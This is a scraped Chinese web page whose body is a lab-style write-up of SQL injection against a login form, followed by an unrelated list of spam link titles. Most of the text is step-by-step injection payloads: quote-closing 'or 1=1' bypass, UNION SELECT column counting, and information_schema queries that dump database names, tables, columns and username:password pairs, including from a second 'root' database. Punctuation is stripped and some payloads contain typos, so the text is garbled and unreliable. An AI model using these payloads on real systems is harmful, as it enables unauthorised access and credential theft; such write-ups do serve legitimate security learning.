当前位置: 首页 > news >正文

游戏网站开发试验报告微商分销商城

游戏网站开发试验报告,微商分销商城,查询网站服务器提供商,wordpress 谷歌字体 360知识点#xff1a; 发现登录框就可以尝试注入登录框一般都是字符型注入通过注入可以获取其他表的信息绕过手段 单引号闭合联合注入也可以进行错误注入 首先看界面是一个登录框#xff1b;通过admin admin登录进去#xff0c;发现页面会把用户名和密码的登录信息打印出来 发现登录框就可以尝试注入登录框一般都是字符型注入通过注入可以获取其他表的信息绕过手段 单引号闭合联合注入也可以进行错误注入 首先看界面是一个登录框通过admin admin登录进去发现页面会把用户名和密码的登录信息打印出来通过bp抓包进行测试是不是存在注入点 开始测试 构造payload:usernameaor11# 页面成功回显除了第一个用户名和密码说明这里存在字符型注入通过单引号闭合进行绕过 既然页面有回显可以尝试进行联合注入尝试先用3个字段前几关的经验 构造payload:usernameaunoionselect1,2,3# 提示字段数不对根据页面返回情况猜测是两个字段 构造payload:usernameaunionselect1,2# 页面成功回显除了输入的信息说明注入成功下面可以进行数据库敏感信息的获取了 联合注入成功获取数据库名 构造payload:usernameaunionselect1,database()# 成功获取了数据库名 接下来获取数据库下的表名 构造payload:usernameaunionselect1,group_concat(table_name)frominformation_schema.tableswheretable_schemasecurity# 成功获取了security下的表名 接下来获取users表中的所有字段名 构造payload:usernameaunionselect1,group_concat(column_name)frominformation_schema.columnswheretable_schemasecurityandtable_nameusers# 成功获取了相关的字段发现里面有用户名和密码 接下来获取相关的数据信息用户名和密码 构造payload:usernameaunionselect1,group_concat(username,:,password)fromusers# 这里直接用users表名了因为当前默认使用的数据库是security所有加不加都可以如果不知道的情况下最好加上如security.users 成功获取了用户的敏感信息 到这里其实就完成了不需要在进行其他操作了但是我想测一下是不是能够读取其他数据库的信息 番外 接着进行操作获取所有数据库名 构造payload:usernameagroup_concat(schema_name)frominformation_schema.schemata# 成功获取了所有的数据库信息发现了一个root数据库 尝试获取root数据库的表名 构造payload:usernameaunionselect1,group_concat(table_name)frominformation_schema.tableswheretable_securityroot# 成功获取了所有的表名发现有一个用户表 尝试读取users表的字段信息 构造payload:usernameaunionselect1,group_concat(column_name)frominformation_schema.tableswheretable_schemarootandtable_nameusers# 成功获取users表中的字段信息 发现存在用户名和密码的字段 接下来对用户名和密码进行读取 构造payload:usernameaunionselect1,grroup_concat(user,:,password)fromroot.users# 这里就要指定数据库了因为默认是security数据库通过指定root.users 成功获取了root表中的所有用户信息可以看出密码进行加密了 到这里就真的结束了真实畅快啊 10
http://www.pierceye.com/news/983124/

相关文章:

  • 网站设计制作音乐排行榜44555pd永久四色端口
  • 网站优化方案教程如何注册chn域名网站
  • 怎样建设免费网站个别网站网速慢怎么做
  • 网页设计制作音乐排行榜一键seo提交收录
  • 网站推广要我营业执照复印件conoha wordpress
  • 免费行情软件app网站排行高质量外链网站
  • 免费解析网站制作网站开发项目实战视频
  • 柳州网站建设工作室基金会网站开发方案
  • 龙海网站建设微网站如何建设
  • 手机视频网站怎么做贵阳专业做网站
  • 网站建设题库vps上的网站运行太慢
  • 化妆品网站优化沧州网站制作公司
  • 专业优定软件网站建设上海seo服务
  • 网站充值怎么做的c2c平台的产品类型
  • 阿里去要企业网站建设方案书手机设计房子的软件3d下载
  • 凡科网站登录入轻博客网站开发
  • wordpress微信机器人订阅号性价比高seo网站优化
  • 网站建设全网推广亚马逊seo搜索什么意思
  • 做网站_你的出路在哪里android app for wordpress
  • 代刷网网站建设成都建立网站
  • 建设网站的费用预算商城网站制作
  • 北京网络法庭2018年企业网站优化如何做
  • asp.net做网站的步骤网站维护的作用
  • 网站制作前期所需要准备wordpress邮箱配置文件
  • 网站建设网站排名怎么做赣州专业做网站
  • 吉林电商网站建设价格做网站需要每年都缴费吗
  • 怎样用dede搭建网站域名网址
  • 做网站编辑有前途怎么样才算是一个网站页面
  • 建设鲜花网站前的市场分析网店设计理念
  • 网站建设优化服务公司wordpress非代码方式添加备案号